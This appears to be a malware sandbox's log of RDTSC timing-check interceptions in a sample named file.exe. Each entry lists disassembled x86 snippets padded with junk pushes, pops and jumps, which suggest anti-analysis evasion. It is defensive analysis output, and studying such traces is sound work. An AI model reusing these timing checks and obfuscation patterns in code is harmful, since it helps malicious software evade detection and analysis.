Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B042B second address: 50B0430 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A08E5 second address: 50A094A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ecx, ebx 0x0000000d pushad 0x0000000e mov edi, 783B7B5Ch 0x00000013 mov ax, dx 0x00000016 popad 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a mov di, A160h 0x0000001e pushfd 0x0000001f jmp 00007F8A9D254EB9h 0x00000024 add esi, 59A8D666h 0x0000002a jmp 00007F8A9D254EB1h 0x0000002f popfd 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A094A second address: 50A095D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F21Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A095D second address: 50A0963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0963 second address: 50A0974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0974 second address: 50A0978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0978 second address: 50A097E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A097E second address: 50A09F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8A9D254EB1h 0x00000009 sub eax, 17F557D6h 0x0000000f jmp 00007F8A9D254EB1h 0x00000014 popfd 0x00000015 jmp 00007F8A9D254EB0h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 pushfd 0x00000024 jmp 00007F8A9D254EB3h 0x00000029 and eax, 19A141BEh 0x0000002f jmp 00007F8A9D254EB9h 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A09F9 second address: 50A09FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A09FF second address: 50A0A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0A03 second address: 50A0A4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F223h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F8A9C76F229h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 mov di, ax 0x00000019 popad 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov bl, FEh 0x00000020 mov eax, 43774FBFh 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0A4B second address: 50A0A7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8A9D254EB3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0A7C second address: 50A0A82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0A82 second address: 50A0ABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F8A9D254EB0h 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8A9D254EAAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0ABC second address: 50A0AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0AC0 second address: 50A0AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0AC6 second address: 50A0B09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F21Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007F8A9C76F221h 0x00000010 test esi, esi 0x00000012 jmp 00007F8A9C76F21Eh 0x00000017 je 00007F8B0E5E4AA9h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 mov ecx, 31AB8BC3h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0B09 second address: 50A0B64 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8A9D254EB8h 0x00000008 sub al, FFFFFF88h 0x0000000b jmp 00007F8A9D254EABh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007F8A9D254EB6h 0x0000001b jmp 00007F8A9D254EB5h 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0B64 second address: 50A0BA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F220h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000011 jmp 00007F8A9C76F220h 0x00000016 mov ecx, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8A9C76F21Ah 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0BA0 second address: 50A0BAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0BAF second address: 50A0BE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F229h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F8B0E5E49EDh 0x0000000f pushad 0x00000010 mov ax, F723h 0x00000014 popad 0x00000015 test byte ptr [76FA6968h], 00000002h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0BE4 second address: 50A0BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0BEB second address: 50A0C10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov edx, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F8B0E5E49D6h 0x00000011 jmp 00007F8A9C76F21Ch 0x00000016 mov edx, dword ptr [ebp+0Ch] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C10 second address: 50A0C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C14 second address: 50A0C50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop edi 0x00000008 popad 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F8A9C76F21Eh 0x0000000f push eax 0x00000010 jmp 00007F8A9C76F21Bh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8A9C76F225h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C50 second address: 50A0C56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C56 second address: 50A0C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C5A second address: 50A0C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C5E second address: 50A0C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C6D second address: 50A0C73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C73 second address: 50A0C79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C79 second address: 50A0C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C7D second address: 50A0C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C8E second address: 50A0C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C92 second address: 50A0C98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C98 second address: 50A0C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0C9E second address: 50A0CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0CEF second address: 50A0CF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0CF5 second address: 50A0CFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0CFB second address: 50A0CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0CFF second address: 50A0D0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0D0E second address: 50A0D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0D12 second address: 50A0D18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0D18 second address: 50A0D3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0D3B second address: 50A0D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0D3F second address: 50A0D5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0C56 second address: 50B0CB3 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 77532DB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F8A9C76F21Ah 0x00000012 adc ah, FFFFFFA8h 0x00000015 jmp 00007F8A9C76F21Bh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F8A9C76F228h 0x00000021 jmp 00007F8A9C76F225h 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0CB3 second address: 50B0CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0CB7 second address: 50B0CBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0CBD second address: 50B0CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0CC3 second address: 50B0D1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F21Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov ebx, eax 0x00000010 pushfd 0x00000011 jmp 00007F8A9C76F21Ah 0x00000016 or esi, 4C98A4C8h 0x0000001c jmp 00007F8A9C76F21Bh 0x00000021 popfd 0x00000022 popad 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 movsx edi, cx 0x0000002a pushfd 0x0000002b jmp 00007F8A9C76F21Ch 0x00000030 add ah, 00000028h 0x00000033 jmp 00007F8A9C76F21Bh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0D1C second address: 50B0D22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0D22 second address: 50B0D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0A0D second address: 50B0A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0A13 second address: 50B0A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0A17 second address: 50B0A5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F8A9D254EB6h 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 mov dl, ch 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8A9D254EABh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5130C00 second address: 5130C63 instructions: 0x00000000 rdtsc 0x00000002 mov eax, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F8A9C76F229h 0x00000011 sbb esi, 280018C6h 0x00000017 jmp 00007F8A9C76F221h 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f pop esi 0x00000020 pop edi 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov ax, bx 0x0000002a call 00007F8A9C76F227h 0x0000002f pop esi 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5130C63 second address: 5130C69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5130021 second address: 513003C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 345B5A45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8A9C76F21Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 513003C second address: 5130042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5130042 second address: 5130046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5130046 second address: 5130064 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx ebx, cx 0x00000012 mov di, cx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5130064 second address: 513009E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8A9C76F227h 0x00000009 add al, FFFFFFFEh 0x0000000c jmp 00007F8A9C76F229h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 513009E second address: 51300CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 jmp 00007F8A9D254EACh 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8A9D254EB7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51300CD second address: 51300E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A9C76F224h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120DBE second address: 5120DC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120DC2 second address: 5120DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5120DC8 second address: 5120E06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 push edx 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, 2F469859h 0x00000014 pushfd 0x00000015 jmp 00007F8A9D254EB6h 0x0000001a adc esi, 3CACFEE8h 0x00000020 jmp 00007F8A9D254EABh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C004D second address: 50C0053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 513030E second address: 51303A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8A9D254EB6h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F8A9D254EB0h 0x00000016 push dword ptr [ebp+0Ch] 0x00000019 jmp 00007F8A9D254EB0h 0x0000001e push dword ptr [ebp+08h] 0x00000021 jmp 00007F8A9D254EB0h 0x00000026 call 00007F8A9D254EA9h 0x0000002b pushad 0x0000002c movzx eax, di 0x0000002f jmp 00007F8A9D254EB3h 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F8A9D254EB4h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51303A4 second address: 51303AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51303AA second address: 51303F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F8A9D254EB1h 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007F8A9D254EB1h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F8A9D254EACh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51303F7 second address: 513040D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F21Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 513040D second address: 5130411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5130411 second address: 5130417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0393 second address: 50D03A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A9D254EACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D03A3 second address: 50D03A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D03A7 second address: 50D03D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F8A9D254EACh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F8A9D254EB0h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D03D7 second address: 50D03DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D03DB second address: 50D03DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D03DF second address: 50D03E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D03E5 second address: 50D0448 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b jmp 00007F8A9D254EB0h 0x00000010 push 109C4EF3h 0x00000015 jmp 00007F8A9D254EB1h 0x0000001a xor dword ptr [esp], 66648EEBh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F8A9D254EB8h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0448 second address: 50D0457 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F21Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0457 second address: 50D0480 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 38h 0x00000005 mov dx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007F8A9D254EA9h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edi, 2B60D4AAh 0x00000018 call 00007F8A9D254EABh 0x0000001d pop esi 0x0000001e popad 0x0000001f rdtsc
